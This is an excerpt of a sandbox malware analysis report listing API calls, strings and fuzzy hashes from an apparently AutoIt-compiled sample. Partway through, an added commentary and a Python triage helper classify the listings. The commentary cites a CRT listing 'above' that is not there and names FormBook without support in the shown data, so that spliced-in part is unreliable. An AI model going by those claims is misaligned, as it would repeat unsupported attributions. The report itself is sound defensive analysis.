                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: >>>AUTOIT SCRIPT<<<$\
                                                • API String ID: 0-1896584978
                                                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
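The two function blocks above carry the report's two most actionable static clues: a GetProcAddress sequence for FlsAlloc/FlsGetValue/FlsSetValue/FlsFree followed by a TlsAlloc fallback (the MSVC CRT's own multithreading initialisation probing for fiber-local storage, which is what the generic "dynamically determine API calls" signature keys on, and is not evasion by itself), and the ">>>AUTOIT SCRIPT<<<" string, the marker the AutoIt3 runtime stub carries in compiled AutoIt executables. The following Python is an added triage example, not code from the report or from Joe Sandbox: it parses "APIs" and "String ID" lines in the exact form the report prints them and tags each block accordingly. The two sample inputs are the listings above copied as printed; the tag names, the `parse_listing`/`triage` helpers and the assumption that the report always shows the export name as the second GetProcAddress argument are mine. The inference that the FormBook payload is delivered inside a compiled AutoIt script is drawn from the detection name plus the marker, not stated by the report.

```python
"""Triage helper for Joe Sandbox per-function listings (added example, not report code)."""
import re

# One API line as printed in the report; the bullet and the
# "Part of subcall function XXXX:" prefix are both optional, e.g.
#   • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
#   • __mtterm.LIBCMT ref: 00417C34
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The report joins a function's referenced strings with "$".
STRING_ID_LINE = re.compile(r"^\s*•?\s*String ID:\s*(?P<ids>.*)$")

# Exports the MSVC CRT's multithread initialisation resolves at runtime: it probes
# KERNEL32 for fiber-local storage and falls back to TlsAlloc/TlsSetValue if absent.
CRT_FLS_PROBE = {"FlsAlloc", "FlsGetValue", "FlsSetValue", "FlsFree"}
# Marker string carried by the AutoIt3 runtime stub in compiled AutoIt executables.
AUTOIT_MARKER = ">>>AUTOIT SCRIPT<<<"


def parse_listing(listing):
    """Return ([{api, module, args, ref}, ...], [string, ...]) for one function block."""
    apis, strings = [], []
    for line in listing.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            apis.append({"api": m.group("api"), "module": m.group("module"),
                         "args": args, "ref": m.group("ref")})
            continue
        m = STRING_ID_LINE.match(line)
        if m and m.group("ids").strip():
            strings.extend(m.group("ids").split("$"))
    return apis, strings


def triage(listing):
    """Summarise one function block and attach triage tags (tag names are mine)."""
    apis, strings = parse_listing(listing)
    names = [a["api"] for a in apis]
    # Assumption: the export name is the second GetProcAddress argument when resolved.
    targets = [a["args"][1] for a in apis
               if a["api"] == "GetProcAddress" and len(a["args"]) > 1 and a["args"][1] != "?"]
    tags = []
    if targets:
        if CRT_FLS_PROBE.issubset(targets) and "TlsAlloc" in names:
            tags.append("msvc_crt_fls_probe")      # CRT start-up, not evasion
        else:
            tags.append("dynamic_api_resolution")  # worth a closer look
    if AUTOIT_MARKER in strings:
        tags.append("autoit_runtime_marker")
    return {"apis": names, "getprocaddress_targets": targets,
            "strings": strings, "tags": tags}


# Constructed inputs: the two function listings from the report above, copied as printed.
SAMPLE_CRT_INIT = "\n".join([
    "• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28",
    "• __mtterm.LIBCMT ref: 00417C34",
    "  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A",
    "• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A",
    "• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57",
    "• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64",
    "• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71",
    "• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1",
    "• TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC",
    "• GetCurrentThreadId.KERNEL32 ref: 00417D80",
    "• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL",
])
SAMPLE_AUTOIT = "\n".join([
    "• API ID:",
    "• String ID: >>>AUTOIT SCRIPT<<<$\\",
    "• API String ID: 0-1896584978",
])

if __name__ == "__main__":
    for name, sample in (("crt_init", SAMPLE_CRT_INIT), ("autoit", SAMPLE_AUTOIT)):
        r = triage(sample)
        print(name, r["tags"], r["getprocaddress_targets"], r["strings"])
```

The benign-pattern rule is deliberately narrow: it only suppresses the hit when all four Fls* names are resolved and TlsAlloc is present in the same function, which is the CRT shape; any other GetProcAddress target keeps the "dynamic_api_resolution" tag so a resolver for injection or networking APIs is not hidden by the same rule.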
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2485277191-404129466
                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                APIs
                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                APIs
                                                • _wcslen.LIBCMT ref: 00464B28
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                • _wcslen.LIBCMT ref: 00464C28
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                • _wcslen.LIBCMT ref: 00464CBA
                                                • _wcslen.LIBCMT ref: 00464CD0
                                                • _wcslen.LIBCMT ref: 00464CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$Directory$CurrentSystem
                                                • String ID: D
                                                • API String ID: 1914653954-2746444292
                                                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                • String ID: *.*
                                                • API String ID: 1153243558-438819550
                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll
                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                • API String ID: 3832890014-4202584635
                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                APIs
                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                • GetFocus.USER32 ref: 0046A0DD
                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessagePost$CtrlFocus
                                                • String ID: 0
                                                • API String ID: 1534620443-4108050209
                                                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$CreateDestroy
                                                • String ID: ,$tooltips_class32
                                                • API String ID: 1109047481-3856767331
                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                • String ID: 0
                                                • API String ID: 1441871840-4108050209
                                                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 3631882475-2268648507
                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                • SendMessageW.USER32 ref: 00471740
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                • SendMessageW.USER32 ref: 0047184F
                                                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 4116747274-0
                                                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                • _wcslen.LIBCMT ref: 00461683
                                                • __swprintf.LIBCMT ref: 00461721
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                • GetParent.USER32(?), ref: 004618C3
                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
